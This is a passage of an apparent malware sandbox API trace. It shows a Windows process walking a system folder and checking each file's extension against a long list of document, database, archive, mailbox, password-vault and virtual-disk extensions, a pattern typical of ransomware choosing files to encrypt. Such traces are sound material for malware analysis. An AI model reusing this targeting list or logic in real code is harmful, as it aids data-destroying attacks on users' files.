lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.876] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.876] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.876] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="boxed-correct.avi" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" [0039.876] PathFindExtensionW (pszPath="boxed-correct.avi") returned=".avi" [0039.876] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".avi.") returned 5 [0039.876] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".avi.") returned 0x0 [0039.876] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.876] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="boxed-delete.avi" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" [0039.876] PathFindExtensionW (pszPath="boxed-delete.avi") returned=".avi" [0039.876] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".avi.") returned 5 [0039.876] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".avi.") returned 0x0 [0039.877] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.877] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="boxed-join.avi" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" [0039.877] PathFindExtensionW (pszPath="boxed-join.avi") returned=".avi" [0039.877] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".avi.") returned 5 [0039.877] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".avi.") returned 0x0 [0039.877] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.877] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="boxed-split.avi" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" [0039.877] PathFindExtensionW (pszPath="boxed-split.avi") returned=".avi" [0039.877] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".avi.") returned 5 [0039.877] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".avi.") returned 0x0 [0039.877] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.877] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="correct.avi" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" [0039.877] PathFindExtensionW (pszPath="correct.avi") returned=".avi" [0039.877] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".avi.") returned 5 [0039.877] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".avi.") returned 0x0 [0039.877] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.877] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="delete.avi" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" [0039.877] PathFindExtensionW (pszPath="delete.avi") returned=".avi" [0039.877] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".avi.") returned 5 [0039.878] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".avi.") returned 0x0 [0039.878] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.878] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="FlickLearningWizard.exe.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui" [0039.878] PathFindExtensionW (pszPath="FlickLearningWizard.exe.mui") returned=".mui" [0039.878] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.878] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.878] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.878] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="InkObj.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui" [0039.878] PathFindExtensionW (pszPath="InkObj.dll.mui") returned=".mui" [0039.878] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.878] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.878] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.878] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="InkWatson.exe.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" [0039.878] PathFindExtensionW (pszPath="InkWatson.exe.mui") returned=".mui" [0039.878] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.878] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.879] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.879] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="InputPersonalization.exe.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" [0039.879] PathFindExtensionW (pszPath="InputPersonalization.exe.mui") returned=".mui" [0039.879] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.879] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.879] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.879] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="IPSEventLogMsg.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" [0039.879] PathFindExtensionW (pszPath="IPSEventLogMsg.dll.mui") returned=".mui" [0039.879] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.879] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.879] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.880] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="IpsMigrationPlugin.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" [0039.880] PathFindExtensionW (pszPath="IpsMigrationPlugin.dll.mui") returned=".mui" [0039.880] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.880] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.880] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.880] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="join.avi" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" [0039.880] PathFindExtensionW (pszPath="join.avi") returned=".avi" [0039.880] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".avi.") returned 5 [0039.880] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".avi.") returned 0x0 [0039.880] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.880] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="micaut.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" [0039.880] PathFindExtensionW (pszPath="micaut.dll.mui") returned=".mui" [0039.880] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.881] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.881] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.881] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="mip.exe.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" [0039.881] PathFindExtensionW (pszPath="mip.exe.mui") returned=".mui" [0039.881] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.881] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.881] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.881] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="mshwLatin.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" [0039.882] PathFindExtensionW (pszPath="mshwLatin.dll.mui") returned=".mui" [0039.882] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.882] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.882] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.882] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="rtscom.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" [0039.882] PathFindExtensionW (pszPath="rtscom.dll.mui") returned=".mui" [0039.882] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.882] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.883] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.883] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="ShapeCollector.exe.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" [0039.883] PathFindExtensionW (pszPath="ShapeCollector.exe.mui") returned=".mui" [0039.883] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.883] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.883] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.883] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="split.avi" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" [0039.883] PathFindExtensionW (pszPath="split.avi") returned=".avi" [0039.883] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".avi.") returned 5 [0039.883] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".avi.") returned 0x0 [0039.883] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.883] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="tabskb.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui" [0039.883] PathFindExtensionW (pszPath="tabskb.dll.mui") returned=".mui" [0039.883] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.883] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.884] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.884] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="TipBand.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" [0039.884] PathFindExtensionW (pszPath="TipBand.dll.mui") returned=".mui" [0039.884] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.884] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.884] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.884] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="TipRes.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" [0039.884] PathFindExtensionW (pszPath="TipRes.dll.mui") returned=".mui" [0039.884] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.884] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.884] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.884] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui" [0039.884] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.884] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.884] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.884] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.884] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="TipTsf.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui" [0039.884] PathFindExtensionW (pszPath="TipTsf.dll.mui") returned=".mui" [0039.884] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.884] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.885] 